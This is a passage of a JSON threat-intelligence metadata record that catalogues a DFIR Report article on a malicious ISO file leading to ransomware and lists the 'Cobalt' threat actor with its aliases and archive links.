	],
	"references": [
		"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/"
	],
	"report_names": [
		"malicious-iso-file-leads-to-domain-wide-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434640,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/eb3444ea8d32605e1e3085e287554ec9bb571a0c.pdf",
		"text": "https://archive.orkl.eu/eb3444ea8d32605e1e3085e287554ec9bb571a0c.txt",
		"img": "https://archive.orkl.eu/eb3444ea8d32605e1e3085e287554ec9bb571a0c.jpg"
	}
}